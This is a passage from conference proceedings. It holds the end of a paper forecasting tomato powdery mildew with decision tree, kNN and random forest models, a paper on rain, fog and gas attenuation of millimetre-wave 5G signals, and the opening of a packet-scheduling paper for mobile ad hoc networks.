Step 4: Lastly, the most frequent prediction becomes the final prediction of the
RF algorithm.
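A minimal sketch of this ensemble procedure is given below; it uses scikit-learn's DecisionTreeClassifier as the base learner purely for illustration (the study built its models in RStudio), and the number of trees is an arbitrary assumption.

```python
import numpy as np
from collections import Counter
from sklearn.tree import DecisionTreeClassifier

def random_forest_predict(X_train, y_train, X_test, n_trees=25, seed=0):
    rng = np.random.default_rng(seed)
    all_votes = []
    for _ in range(n_trees):
        # Step 1: draw a bootstrap (random) sample of the training data
        idx = rng.integers(0, len(X_train), size=len(X_train))
        # Step 2: build an individual decision tree on that sample
        tree = DecisionTreeClassifier(random_state=seed).fit(X_train[idx], y_train[idx])
        # Step 3: collect each tree's individual prediction
        all_votes.append(tree.predict(X_test))
    all_votes = np.array(all_votes)
    # Step 4: the most frequent prediction (majority vote) is the RF output
    return np.array([Counter(all_votes[:, i]).most_common(1)[0][0]
                     for i in range(all_votes.shape[1])])
```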

3.5 Performance Metric: Accuracy

Development of a prediction model is not worthwhile unless it provides accurate
predictions for the concerned problem domain. Therefore, performance evaluation of a
prediction model becomes a significant task for the researchers. Many such perfor-
mance metrics exist which have been used by various scientists, time to time in order
to evaluate the quality of the model. Accuracy is the most common performance
Fig. 3 Block diagram of the RF algorithm: the dataset is split into random samples 1 to n, a decision tree is built for each sample, each tree gives its own prediction, the majority votes are counted, and the most frequent prediction is selected

metric, which is equal to the ratio between the number of accurate predictions made
by the classification model and the total number of predictions as shown in Eq. (2).
It can be calculated using a two-dimensional table known as the confusion matrix.
Figure 4 shows a sample confusion matrix.

Accuracy = \frac{\text{Correctly Predicted Observations}}{\text{Total Number of Observations}} = \frac{TP + TN}{TP + FP + TN + FN} \quad (2)

There are some basic terms associated with any confusion matrix, which are as
follows:
• The number of correctly identified instances that do not belong to the class (True
Negative (TN))
• The number of correctly identified instances that belong to the class (True Positive
(TP))
• The number of instances that were either incorrectly assigned to the class (False
Positive (FP)) or not identified as a class instance (False Negative (FN))

Fig. 4 Confusion matrix (rows: predicted; columns: actual), with cells True Positive, False Positive in the top row and False Negative, True Negative in the bottom row
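Equation (2) is easy to verify numerically; the short snippet below recomputes the accuracy from a confusion matrix, using the RF counts reported later in Sect. 4 as an example.

```python
def accuracy_from_confusion(tp, tn, fp, fn):
    # Eq. (2): correctly predicted observations over all observations
    return (tp + tn) / (tp + fp + tn + fn)

# Confusion-matrix entries of the RF model on the TPMD test set (Sect. 4)
print(round(accuracy_from_confusion(tp=13, tn=56, fp=5, fn=0), 4))  # -> 0.9324
```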

4 Results and Discussions

This section discusses the results of the experiment performed on the TPMD dataset.
Initially, the dataset was divided into 70–30 Train-Test ratio. After this, the Train-Set
was used for developing the prediction models for tomato powdery mildew disease
forecasting based on DT, kNN, and RF algorithms. Further, all the three trained
models were tested using Test-Set. Finally, a comparison of these models was made
with the help of the “Accuracy” metric for selecting a most suitable algorithm in
the present work. Figure 5 shows the confusion matrices for DT, kNN, and RF
algorithms. Based on these confusion matrices, the accuracy of DT, kNN, and RF
prediction model was calculated by putting the following values of TP, TN, FP, and
FN in Eq. (2):

DT: TP = 10; TN = 56; FP = 8; FN = 0
Accuracy = (10 + 56)/(10 + 56 + 8 + 0) = 66/74 = 0.8919 = 89.19%
kNN: TP = 12; TN = 56; FP = 6; FN = 0
Accuracy = (12 + 56)/(12 + 56 + 6 + 0) = 68/74 = 0.9189 = 91.89%
RF: TP = 13; TN = 56; FP = 5; FN = 0
Accuracy = (13 + 56)/(13 + 56 + 5 + 0) = 69/74 = 0.9324 = 93.24%

The authors observed that all three algorithms, i.e., kNN, DT, and RF,
performed well on the TPMD dataset, with accuracies lying
within the range of 89.19% to 93.24%, which is considered fairly good. Results
also indicate that the forecasting system based on RF performed the best among all
the three models with an accuracy of 93.24%, whereas DT-based model performed
the worst with 89.19% accuracy as shown in Fig. 6. Hence, it is fair to presume
that the proposed model can be efficiently used in the farming industry for early
prediction of powdery mildew disease detection in tomato plants.

4.1 Comparison with Previous Studies

The TPMD dataset was collected by Bakeer et al. in 2013 [2] to validate a disease
prediction model introduced by Guzman-Plazola in 1997 [9]. Further, in 2020, this
dataset was used by Bhatia et al. [12] for detection of powdery mildew disease
using extreme learning machine (ELM) algorithm. They have used four resampling
Fig. 5 Confusion matrices of DT, kNN, and RF algorithms (rows: predicted; columns: actual, for the conducive and non-conducive classes): (a) DT: 10, 8 / 0, 56; (b) kNN: 12, 6 / 0, 56; (c) RF: 13, 5 / 0, 56

Fig. 6 Performance comparison between DT, kNN, and RF models (accuracy: DT 89.19%, kNN 91.89%, RF 93.24%)


Table 1 Comparison with previous studies
Techniques  Accuracy (%)
Proposed approaches
DT  89.19
kNN  91.89
RF  93.24
Existing approaches
IMPS-ELM [12]  89.91
Hybrid SVM-LR [10]  92.37

techniques, i.e., importance sampling (IMPS), synthetic minority over-sampling
(SMOTE), random under sampling (RUS), and random over sampling (ROS) to
balance the TPMD dataset. They have found that IMPS-ELM has performed the best
with an accuracy of 89.91%. In the same year, Bhatia et al. [10] have proposed a new
approach, namely hybrid SVM-logistic regression (LR) to detect tomato powdery
mildew disease. They have used TPMD dataset for their study. They have claimed
that their proposed model was 92.37% accurate. Table 1 shows an extensive compar-
ison of proposed approaches with the IMPS-ELM and hybrid SVM-LR algorithm.
It is evident from Table 1 that the proposed RF algorithm performed better than both
of the previous approaches, while kNN performed better than the IMPS-ELM
algorithm.

5 Conclusion and Future Scope

In the current study, authors have used three machine learning approaches, namely
kNN, DT, and RF to develop different disease prediction models, and it was found
that RF technique performed the best on TPMD dataset with 93.24% accuracy. Using
the TPMD dataset, the proposed kNN, DT, and RF-based prediction models could predict
whether the meteorological conditions on a particular day are conducive for the
development of disease or not. If the model classifies a particular day as conducive,
then a warning may be sent to the farmer indicating the need to spray the fungicide
at that point of time. This way, the recommendations of the proposed models in
the current study can be used to reduce the unnecessary fungicide spray with no
significant impact on the yield and quality of the fruit. In future, we are planning
to develop a mobile-based application for the early detection of the tomato diseases
on the basis of weather conditions. Once the disease is diagnosed by the model,
this application will suggest the possible solutions through some communication
medium, which will in turn help the farmers to protect the tomato crop by timely
application of control measures. An online plant disease anticipator can also be made
which will give all the details about conducive weather conditions for a specific
disease and also provide possible treatment as per the severity level of that particular
disease.

Acknowledgements This work is financially supported by the Department of Science and Tech-
nology (DST) under a project with reference number “DST/Reference.No.T-319/2018-19.” We are
grateful to them for their immense support.

References

1. Jones, W. B., & Thomson, S. V. (1987). Source of inoculum, yield, and quality of tomato as
affected by Leveillula taurica. Plant disease, 71(3), 266–268.
2. Bakeer, A. R. T., Abdel-Latef, M. A. E., Afifi, M. A., & Barakat, M. E. (2013). Validation of
tomato powdery mildew forecasting model using meteorological data in Egypt. International
Journal of Agriculture Sciences, 5(2), 372.
3. Verma, S., Bhatia, A., Chug, A., & Singh, A. P. (2020). Recent advancements in multimedia
big data computing for IoT applications in precision agriculture: opportunities, issues, and
challenges. In Multimedia big data computing for IoT applications (pp. 391–416). Springer,
Singapore.
4. Fuentes, A., Yoon, S., Kim, S. C., & Park, D. S. (2017). A robust deep-learning-based detector
for real-time tomato plant diseases and pests recognition. Sensors, 17(9), 2022.
5. Verma, S., Chug, A., & Singh, A. P (2018). Prediction models for identification and diag-
nosis of tomato plant diseases. In 2018 International Conference on Advances in Computing,
Communications and Informatics (ICACCI) (pp. 1557—1563).
6. Verma, S., Chug, A., & Singh, A. P. (2020). Application of convolutional neural networks for
evaluation of disease severity in tomato plant. Journal of Discrete Mathematical Sciences and
Cryptography, 23(1), 273–282.
7. Verma, S., Chug, A., & Singh, A. P. (2020). Exploring capsule networks for disease
classification in plants. Journal of Statistics and Management Systems, 23(2), 307–315.
8. Verma, S., Chug, A., Singh, A. P., Sharma, S., & Rajvanshi, P. (2019). Deep learning-based
mobile application for plant disease diagnosis: a proof of concept with a case study on tomato
plant. In Applications of image processing and soft computing systems in agriculture (pp. 242–
271). IGI Global.
9. Guzman-Plazola, R. A. (1997). Development of a spray forecast model for tomato powdery
mildew (Leveillula Taurica (Lev). Arn.). University of California, Davis.
10. Bhatia, A., Chug, A., & Singh, A. P. (2020). Hybrid SVM-LR classifier for powdery mildew
disease prediction in tomato plant. In 2020 7th International Conference on Signal Processing
and Integrated Networks (SPIN) (pp. 218–223). IEEE.
11. Bhatia, A., Chug, A., & Singh, A. P. (2020). Plant disease detection for high dimensional
imbalanced dataset using an enhanced decision tree approach. International Journal of Future
Generation Communication and Networking, 13(4), 71–78.
12. Bhatia, A., Chug, A., & Singh, A. P. (2020). Application of extreme learning machine in
plant disease prediction for highly imbalanced dataset. Journal of Statistics and Management
Systems, 23(6), 1059–1068. https://doi.org/10.1080/09720510.2020.1799504
13. Ghaffari, R., Zhang, F., Iliescu, D., Hines, E., Leeson, M., Napier, R., & Clarkson, J. (2010).
Early detection of diseases in tomato crops: an electronic nose and intelligent systems approach.
In The 2010 International Joint Conference on Neural Networks (IJCNN) (pp. 1–6). IEEE.
14. Rumpf, T., Mahlein, A.-K., Steiner, U., Oerke, E.-C., Dehne, H.-W., & Plümer, L. (2010).
Early detection and classification of plant diseases with support vector machines based on
hyperspectral reflectance. Computers and Electronics in Agriculture, 74(1), 91–99.

15. Prince, G., Clarkson, J. P., & Rajpoot, N. M. (2015). Automatic detection of diseased tomato
plants using thermal and stereo visible light images. PLoS One, 10(4), e0123262.
16. Mokhtar, U., Ali, M. A. S., Hassenian, A. E., & Hefny, H. (2015). Tomato leaves diseases
detection approach based on support vector machines. In 2015 11th International Computer
Engineering Conference (ICENCO) (pp. 246–250). IEEE.
17. Vishwakarma, V. P., & Dalal, S. (2020). A novel non-linear modifier for adaptive illumination
normalization for robust face recognition. Multimedia Tools and Applications, 1–27.
18. Kotsiantis, S. B. (2013). Decision trees: A recent overview. Artificial Intelligence Review, 39(4),
261–283.
19. Liaw, A., & Wiener, M. (2002). Classification and regression by randomForest. R news, 2(3),
18–22.
20. Sabrol, H., & Kumar, S. (2016). Intensity based feature extraction for tomato plant disease
recognition by classification using decision tree. International Journal of Computer Science
and Information Security, 14(9), 622.
Investigate the Effect of Rain, Foliage,
Atmospheric Gases, and Diffraction
on Millimeter (mm) Wave Propagation
for 5G Cellular Networks

Animesh Tripathi, Pradeep K. Tiwari, Shiv Prakash, and N. K. Shukla

Abstract Wireless networking technologies are evolving rapidly to satisfy
growing usage requirements. The burden on current wireless systems has increased
exponentially due to numerous mobile devices, multimedia applications with high
data rates, and audio and video streaming in high definition (HD), while the number of
users of wireless communication systems continues to increase. At the same time,
the usage of data per user has increased. This manifests in the steady growth of
wireless network systems to keep momentum with the growing demand for data rate.
Because of the growth in the number of customers, congestion in the conventional
cellular bands is also rising, so the use of EHF bands in communications is gaining
increasing interest. Millimeter-Wave (mm-Wave) bands are capable of delivering
broad bandwidth applications with multi-Gigabit rate, therefore, attracted significant
attention. However, the mm-Wave bands face a few challenging issues: low-frequency
signals can penetrate walls and cover very long ranges, whereas mm-Waves travel only
short distances and cannot penetrate buildings and other objects. This paper investigates
the propagation properties of millimeter waves and the effects of external influences
such as rain, foliage, atmospheric gases, and diffraction. The main focus is
to analyze the impact of these variables on the propagation of mm-Wave frequencies.
Further, it also measures the damages due to gases in the atmosphere, rain, and foliage
at frequencies that are unlikely to be used in 5G cellular networks. Besides this,
we suggest a data-driven computational intelligence generic framework to optimize
quality of service (QoS) parameters such as bandwidth and path loss.

Keywords Millimeter-wave band · 5G cellular networks · Multi-gigabit rate

A. Tripathi (B) · P. K. Tiwari · S. Prakash · N. K. Shukla


Department of Electronics and Communication, UoA, Prayagraj, India
S. Prakash
e-mail: shivprakash@allduniv.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_42

1 Introduction and Related Work

To meet the challenges of a rising need for higher data rates, larger network
infrastructure, and greater spectral efficiency, 5G cellular networks have been introduced
recently. The data capacity is significantly improved by increasing the channel bandwidth
for different services, to support high-speed Internet-based connectivity
and low-latency applications [1]. The millimeter (mm) wave band will be
used in a substantial way to satisfy the requirement for large bandwidth. For mm-wave
propagation, atmospheric losses between 28 and 38 GHz do not significantly
add to the path loss considered for 5G communications, but
in the higher frequency range of the mm-Wave band, atmospheric absorption becomes
significant, and this range is expected to be used for 5G connectivity deployment in the
near future. Propagation studies have so far been carried out to test the impact of total
path loss at 28 and 38 GHz, and only for the
consequences of rain fading in the mm-wave band. For the better deployment of the 5G
mobile network in the future, there is a requirement of evaluating the effect of rain,
foliage, and other atmospheric attenuation on the output of the cellular mm-wave
system for higher frequency ranges. These bands have certain constraints: the signals
cannot travel significant distances and cannot penetrate structures and other objects.
These restrictions can, however, be exploited to provide more secure communication and allow
high frequency reuse [2–5].
This paper studies the propagation characteristics of mm-Waves and the impact of external
factors such as atmospheric gases, rain, foliage, and diffraction, and proposes a data-driven compu-
tational intelligence-based generic framework to optimize quality of service (QoS)
parameters such as bandwidth and path loss. Our main focus is to
consider the impact of these factors on the propagation of the mm-Wave frequencies
to be utilized for 5G cellular networks. We assess the attenuation due to atmo-
spheric gases, rain, and foliage at the different mm-Wave frequencies which are expected
to be utilized in 5G cellular networks.
Our investigation has been carried out through MATLAB simulations using ITU-R recommendation
models (such as ITU-R P.676-10) to calculate attenuation due to fog, rain, and atmospheric gases.
Millimeter (mm) Wave Propagation: mm-wave communication systems are
widely used in today's world, providing solutions to the restricted bandwidth
and the demand for superior data rates in mobile communications. Mm-Waves are
waves with wavelengths ranging from 1 to 100 mm, supporting data rates up to 10 Gbit/s
[6]. This band has the potential to fulfill the requirements of 5G communications [7].
In the literature, various researchers have studied the effect of atmospheric
fading only for a few frequency bands of mm-Wave, but we consider the whole mm-
Wave band. In China, work on 5G started in 2006 with the 59–64 GHz RF band [8].
Furthermore, RF bands range 40.5–42.3 GHz and 48.4–50.2 GHz, used for light
license management, while for communication, unlicensed management RF bands
range 42.3–47 GHz and 47.2–48.4 GHz are used [8]. In 2010, the Chinese wireless
personal access network (CWPAN) standard working group, set up ITU-T Study
Group 5 (SG5), also called SG5 QLINKPAN, to investigate the feasibility of a 45 GHz
RF band for different applications. In China, the issued 60 GHz band consists of 5 GHz
of contiguous mm-Wave spectrum at 59–64 GHz. In early 2017, South Korea issued a
national broadband plan which suggests the possibility to extend the spectrum in the
28 GHz band by up to 2 GHz to provide access to a total of 3 GHz, 26.5–29.5 GHz.
In 2018, South Korea decided to hold an auction of mm-Wave 5G spectrum with 2400 MHz
bandwidth in the 28 GHz band for three mobile operators [9, 10]. In late 2018, the
three national mobile network operators (MNOs) initiated 5G technology having
mobile hot spots in South Korea (SK Telecom, Korea Telecom (KT), and LGU + ).
The main contribution of this paper is to investigate the effect of rain, fog, cloud, and
atmospheric gases on the whole frequency range at different atmospheric conditions;
apart from this, we suggest a computational framework. After the introduction, this
paper is systematized as follows. Section 2 analyzes the effect due to atmospheric
gas. Section 3 analyzes the effect due to fog and cloud. Section 4 analyzes the effect
due to rain. Section 5 discusses the proposed generic framework with a simulation
study. Finally, this paper is concluded in Sect. 6, and a few outlines are highlighted
as the future scope and work.

2 Investigate the Effect of Attenuation Due to Atmospheric Gas

The attenuation of a signal propagating through gases present in the atmosphere
is computed here. Electromagnetic (EM) signals weaken when they propagate through
the atmosphere. This effect is due primarily to the resonance lines of oxygen
and water vapor, with a small loss due to nitrogen gas [11]. The model additionally
incorporates a continuous absorption spectrum below 10 GHz. The model is valid for
frequencies ranging from 1 to 1000 GHz and applies to both polarized and non-polarized
fields. The specific attenuation at each frequency in this model is
given by Eq. 1

\gamma = \gamma_o(f) + \gamma_w(f) = 0.1820 \, f \, N''(f) \quad (1)

where N''(f) is the imaginary part of the complex refractivity; it contains a spectral-line
part and a continuous part, as given by Eq. 2

 
N''(f) = \sum_i S_i F_i + N''_D(f) \quad (2)

The spectral part is the sum over the discrete spectrum of a localized frequency-shape
function F_i(f) multiplied by a spectral line intensity S_i.
Each spectral line intensity is given by Eq. 3 for atmospheric
oxygen
S_i = a_1 \times 10^{-7} \left(\frac{300}{T}\right)^{3} \exp\left[a_2\left(1 - \frac{300}{T}\right)\right] P \quad (3)

Each spectral line intensity is given by Eq. 4 for atmospheric water vapor.

S_i = b_1 \times 10^{-1} \left(\frac{300}{T}\right)^{3.5} \exp\left[b_2\left(1 - \frac{300}{T}\right)\right] W \quad (4)

P Pressure of dry air (hectopascals)
W Partial pressure of water vapor (hectopascals)
T Ambient temperature (kelvin)
The partial pressure of water vapor, W, is related to the water vapor density (ρ)
as given in Eq. 5

W = \frac{\rho T}{216.7} \quad (5)
P + W is the total atmospheric pressure.
To calculate the overall attenuation for narrowband signals on a path, the specific
attenuation is multiplied by the length of the path, R. The
overall attenuation is then L_g = R(\gamma_o + \gamma_w).
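A small numerical illustration of this step (assuming the specific attenuations γo and γw have already been evaluated from the ITU-R P.676-10 line data, which is not reproduced here) is given below; the numeric inputs are hypothetical.

```python
def water_vapour_partial_pressure(rho_g_m3, temp_k):
    # Eq. (5): W = rho * T / 216.7 (hPa), from the water vapour density rho
    return rho_g_m3 * temp_k / 216.7

def total_gas_attenuation_db(gamma_o, gamma_w, path_km):
    # L_g = R * (gamma_o + gamma_w); specific attenuations in dB/km, path in km
    return path_km * (gamma_o + gamma_w)

# Hypothetical inputs: 7.5 g/m3 water vapour at 288 K, and specific attenuations
# loosely representative of the strong oxygen absorption region
print(round(water_vapour_partial_pressure(rho_g_m3=7.5, temp_k=288.0), 2))  # hPa
print(total_gas_attenuation_db(gamma_o=14.0, gamma_w=0.65, path_km=1.0))    # dB
```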

3 Investigate the Effect of Attenuation Due to Fog and Cloud

This model applies the cloud and fog attenuation model of the
International Telecommunication Union (ITU) to measure the attenuation that
cloud and fog impose on signal propagation. The model is based on the signal
path length, signal frequency, liquid water density, and ambient temperature. It
applies to cases where the signal path is completely contained
in a uniform fog or cloud environment, so that the density of liquid
water does not vary along the signal path.

The attenuation of signals that propagate through fog or clouds is determined by this
model (Recommendation ITU-R P.840-6). The model measures the specific
attenuation (dB/km) of the signal for polarized and non-polarized fields [12]. The
expression for the specific attenuation at every frequency is given by Eq. 6

\gamma_c = k_l(f) M \quad (6)

where
M is the liquid water density (g/m3).
The quantity k_l(f) is the specific attenuation coefficient, which depends on
frequency.
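For completeness, the corresponding one-line computation for fog or cloud (Eq. 6), with an assumed value for the specific attenuation coefficient, can be sketched as follows.

```python
def fog_attenuation_db(k_l, liquid_water_g_m3, path_km):
    # Eq. (6): gamma_c = k_l(f) * M (dB/km), accumulated over the path length
    return k_l * liquid_water_g_m3 * path_km

# Assumed k_l value; liquid water density 0.4 g/m3 over a 1 km path (see Sect. 5)
print(fog_attenuation_db(k_l=1.0, liquid_water_g_m3=0.4, path_km=1.0))
```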

4 Investigate the Effect of Attenuation Due to Rainfall

We use the rainfall attenuation model of the International Telecommunication Union
(ITU) to quantify the path loss of signals propagating in rainfall areas. The attenuation of
signals propagating across regions of rainfall is determined by this model. Rain atten-
uation is the dominant fading mechanism and can differ from place to place
and from time to time. When propagating through an area of rainfall, electromag-
netic signals are attenuated. The rainfall attenuation is determined according to
Recommendation ITU-R P.838-3: Specific attenuation
model for rain for use in prediction methods [13]. As a function of rainfall intensity,
signal frequency, polarization, and path elevation angle, the model computes the specific
attenuation (attenuation per kilometer) of a signal. The specific attenuation, γR, as a function of
rain rate is modeled as the power law given by
Eq. 7

\gamma_R = k R^{\alpha} \quad (7)

where
R is the rate of rainfall (millimeters/hour).
The parameter k and the exponent α depend on the signal frequency,
path elevation angle, and polarization.
The overall attenuation for narrowband signals along a path is obtained by multiplying the
specific attenuation by the effective propagation distance, d_eff. The total
attenuation is then L = d_eff γ_R.
The effective distance is the product of the geometrical distance, d, and a scale
factor

r = \frac{1}{0.477\, d^{0.633} R_{0.01}^{0.073\alpha} f^{0.123} - 10.579\,(1 - \exp(-0.024\, d))} \quad (8)

where
f is the signal frequency, d is the geometrical path length, and R_{0.01} is the rain rate exceeded for 0.01% of the time.
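Putting Eqs. (7) and (8) together gives the total rain attenuation for a path. The sketch below is only an illustration with assumed power-law coefficients (k and α depend on frequency and polarization and are tabulated in ITU-R P.838-3), not a validated implementation.

```python
import math

def rain_attenuation_db(freq_ghz, rain_rate_mm_h, d_km, k, alpha):
    gamma_r = k * rain_rate_mm_h ** alpha            # Eq. (7), specific attenuation in dB/km
    r = 1.0 / (0.477 * d_km ** 0.633                 # Eq. (8), distance scale factor
               * rain_rate_mm_h ** (0.073 * alpha)
               * freq_ghz ** 0.123
               - 10.579 * (1.0 - math.exp(-0.024 * d_km)))
    return r * d_km * gamma_r                        # L = d_eff * gamma_R

# Assumed coefficients roughly representative of 40 GHz; rain rate 20 mm/h, 1 km path
print(round(rain_attenuation_db(40.0, 20.0, 1.0, k=0.35, alpha=0.94), 2))
```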

5 Simulation Work and Discussion

In this section, we describe how our simulation work is done. We obtain the attenuation
due to atmospheric gases, clouds, and rain at different rain rates [16, 17]. We have
divided the whole mm-Wave band into different frequency ranges so that the
results are easy to interpret. First, we investigate the attenuation due to atmospheric gases,
dividing the whole mm-Wave band into the 20–50 GHz, 50–100 GHz, 100–200 GHz, and
200–300 GHz bands. Proposed framework: based on the collected data and its
analysis, a data-driven framework will be proposed in the future which
will optimize the required quality of service (QoS) parameters.
The framework is as follows.
General framework using computational intelligence:
1. Initialization of algorithm-specific parameters for the different scenarios
2. Collect the simulation statistics for each scenario over the data set
3. Calculate the QoS parameters using the statistics obtained in the previous stage
4. Capture the results obtained in the previous stage
5. Apply visualization and optimization tools to compare the algorithms using computational intelligence

Figure 1 shows the attenuation for the frequency range 20–50 GHz; the graph
contains two lines, one blue and one red. The blue line shows
the absorption due to oxygen and air with a water vapor density of 7 g/m3, and the red line
shows the attenuation due to oxygen and dry air with zero water vapor density. The curves
clearly show that the signal attenuation is higher for moist air than for dry air. In
the frequency range 20–50 GHz, the attenuation is not significantly high, but Fig. 2
clearly shows that at 60 GHz the attenuation is 14.65 dB, which is not suitable for 5G
cellular networks. In Fig. 3, there are two peaks in the graph: at 120 GHz
the specific attenuation is about 2 dB, which is not severe, but at 183 GHz the loss

Fig. 1 Gas attenuation for frequency 20–50 GHz

Fig. 2 Gas attenuation for frequency 50–100 GHz

due to atmospheric gases is 28.34 dB, which is significantly high. Figure 4 shows the
graph for the 200–300 GHz frequency range, where the losses do not fluctuate much.
After investigating attenuation due to atmospheric gases, we investigate the effect
of fog and cloud and calculate the attenuation of signals that spread through a cloud

Fig. 3 Gas attenuation for frequency 100–200 GHz

Fig. 4 Gas attenuation for frequency 200–300 GHz



Fig. 5 Fog attenuation for frequency 20–300 GHz

1 km long at an altitude of 1000 m. The attenuation is measured for frequencies
from 20 to 300 GHz. A typical value for the cloud liquid water density is 0.4 g/m3.
Figure 5 shows that the fog attenuation (in dB/km) increases with
frequency. Next, we investigate the effect of rain on the mm-Wave frequencies. We
select three rain rates, i.e., 10, 15, and 20 mm/hour, over the frequency range 20–300 GHz.
In Figs. 6, 7, and 8, we can see that the attenuation increases with the
rain rate. At 40 GHz, the attenuation in Figs. 6, 7, and 8 is 5.2, 7.2,
and 9.0 dB, respectively. Beyond 105 GHz, the attenuation starts decreasing.

6 Conclusion and Future Scope

Wireless networking technologies are evolving rapidly to satisfy growing
usage requirements. The burden on current wireless systems has increased expo-
nentially due to numerous mobile devices, multimedia applications with high data
rates, and high-definition (HD) audio and video streaming, while the number of users of
wireless communication systems continues to increase. At the same time, the usage
of data per user has increased. This paper has studied and analyzed the impact of
these variables on the propagation of mm-Wave frequencies. Further, it also measures
the losses due to atmospheric gases, rain, and foliage at frequencies that are
unlikely to be used in 5G cellular networks [18, 19]. Besides this, we suggest a data-
driven computational intelligence generic framework to optimize quality of service
(QoS) parameters such as bandwidth and path loss under artificial rain and dust [20]. In

Fig. 6 Rain attenuation for frequency 20–300 GHz at rain rate 10 mm/hr

Fig. 7 Rain attenuation for frequency 20–300 GHz at rain rate 15 mm/hr

Fig. 8 Rain attenuation for frequency 20–300 GHz at rain rate 20 mm/hr

the future, we will develop different data-driven and mathematical models to address
the problem using computational intelligence frameworks.

References

1. Rappaport, T., et al. (2013). Millimeter wave mobile communications for 5G cellular: It will
work! IEEE Access, 1, 335–349.
2. Marcus, M., & Pattan, B. (2005). Millimeter wave propagation: Spectrum management
implications. IEEE Microwave Magnetic, 6(2), 54–62.
3. Pi, Z., & Khan, F. (2011). An introduction to millimeter-wave mobile broadband systems.
Communications Magazine, IEEE, 49(6), 101–107.
4. Wheeler, T. Leading towards next generation “5G” mobile services. Federal Communications
Commission. Retrieved 25 July 2016.
5. Yong, L., Depeng, J., Li, S., & Athanasios, V. V. (2015). A survey of millimeter wave (mmWave)
communications for 5G: opportunities and challenges (pp. 1–20)
6. Rappaport, T. S. et al. (2015) In Millimeter wave wireless communications. Pearson Education.
7. Uwaechia, A. N., & Mahyuddin, N. M. (2020). A comprehensive survey on millimeter
wave communications for fifth-generation wireless networks: feasibility and challenges. IEEE
Access, 8, 62367–62414.
8. Haiming, W., Wei, H., Jixin, C., Bo, S., & Xiaoming, P. (2014). IEEE 802.11aj (45 GHz):
A new very high throughput millimeter-wave WLAN system. China Communications, 11(6),
51–62.
9. Kürner, T., & Priebe, S. (2014). Towards THz communications-status in research standardiza-
tion and regulation. Journal Infrastructure Millimeter THz Waves, 35(1), 53–62.
10. Current 5G Commercial Network Including Current 5G Research (2019, December 12) 5G
Field Testing/5G Trials, and 5G Development by Country.

11. Radiocommunication Sector of International Telecommunication Union. (2013). Recommen-
dation ITU-R P.676-10: Attenuation by atmospheric gases.
12. Radiocommunication Sector of International Telecommunication Union. (2013). Recommen-
dation ITU-R P.840-6: Attenuation due to clouds and fog.
13. Radiocommunication Sector of International Telecommunication Union. (2005). Recommen-
dation ITU-R P.838-3: Specific attenuation model for rain for use in prediction methods.
14. Radiocommunication Sector of International Telecommunication Union. (2017). Recommen-
dation ITU-R P.530–17: Propagation data and prediction methods required for the design of
terrestrial line-of-sight systems.
15. Recommendation ITU-R P.837–7 Characteristics of precipitation for propagation modeling.
16. Das, D., & Maitra, A. (2015). Rain attenuation prediction during rain events in different climatic
regions. Journal Atmosphere Solar-Terrestrial Physics, 128(1), 1–7.
17. Zhao, Q., & Li, J. (2006, October). Rain attenuation in millimeter wave ranges. In Proceedings
IEEE International Symposium Antennas, Propagation, and EM Theory.
18. Lam, H. Y., Luini, L., Din, J., et al. (2017). Impact of rain attenuation on 5G millimeter
wave communication systems in equatorial Malaysia investigated through disdrometer data’.
In European Conference Proceedings Antennas and Propagation (EuCAP), Paris France,
(pp. 1793–1797).
19. Tataria, H., Haneda, K., Molisch, A. F., Shafi, M., & Tufvesson, F. (2020). Standardization
of propagation models for terrestrial cellular systems: A historical perspective. International
Journal of Wireless Information Networks, 1–25.
20. Shafi, M., Jha, R. K., & Sabraj, M. (2020). A survey on security issues of 5G NR: Perspective
of artificial dust and artificial rain. Journal of Network and Computer Applications, 102597.
Packet Scheduling Algorithm
to improvise the Packet Delivery Ratio
in Mobile Ad hoc Networks

Suresh Kurumbanshi, Shubhangi Rathkanthiwar, and Shashikant Patil

Abstract Due to recent advances in wireless communication technologies and the
changing demands on mobile ad hoc networks, there is a need to design energy efficient
networks. These networks are autonomous and continuously monitored using various
sensors, creating an IoT hub. Due to network scalability and irregular connectivity, they may
face issues of limited battery power and of sharing bandwidth among users. Improving
the packet delivery of mobile networks with less power is always a challenging
task. This paper suggests a novel packet scheduling algorithm to improve the packet
delivery of the network. In this paper, ad hoc networks are deployed for mobile nodes, and
packets are scheduled using the novel packet scheduling algorithm. Packet scheduling
is done by adjusting the packet interarrival time using Pareto's burst time parameter. This
approach targets balancing the data collection of IoT networks and improves the packet
delivery and residual energy of the network. Simulation results in NS2 are presented for
mobile nodes deployed in a grid scenario, and the packet delivery ratio of the network is
improved using the proposed packet scheduling algorithm.

Keywords Mobile networks · Packet scheduling · Packet delivery ratio · Residual energy · Pareto

1 Introduction

In today's era, the ongoing requirements of mobile data collection within IoT-enabled
networks pose challenges in designing energy efficient networks, choosing communication
types and network topology, and scheduling packets for effective data delivery.
Several node structures and deployments have been suggested [1–3]. Looking at
daily requirements, there has been tremendous growth in multimedia devices. These

S. Kurumbanshi (B) · S. Patil


Department of Electronics and Telecommunication Engineering, MPSTME, NMIMS University,
Shirpur Campus, Sawalde, India
S. Rathkanthiwar
Department of Electronics Engineering, YCCE, Nagpur, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_43

devices produce data which is useful in designing sensors for IoT-enabled networks.
The number of sensors connected to IoT networks reached almost 24 billion in 2020
[4, 5].
The sensors generate data from various collection units such as bridges, roads, and
street lamps. Therefore, collecting multimedia data from nodes becomes an important
concern in the IoT. The limited delivery range of a sensor neither satisfies the
user demands nor provides support for multimedia-enabled big data
applications. Deploying data sensors and their related communication
technologies requires high cost. One effective way to address this issue is to deploy
a mobile node scenario that collects data and transmits the multimedia data while
moving [6]. Hybrid protocols (HWMP) have been developed operating at layer 2
in the IEEE standard. It includes mesh points which are connected to gateways which
are more efficient in avoiding congestion of the network [7]. Load balancing method
reduces congestion effectively in networks. In wireless mesh networks, traffic is
distributed to various paths having least congestion and achieves better performance
[8, 9]. Some routing methods have been suggested to balance the routing load and improve
link quality for ad hoc networks [10–15].
In multi-path routing mechanisms, routing metrics are suggested considering the
quality of wireless link [16, 17], energy of neighboring nodes and interference [18],
AOMDV (QLB-AOMDV) and QOS in [19], and load balanced congestion adaptive
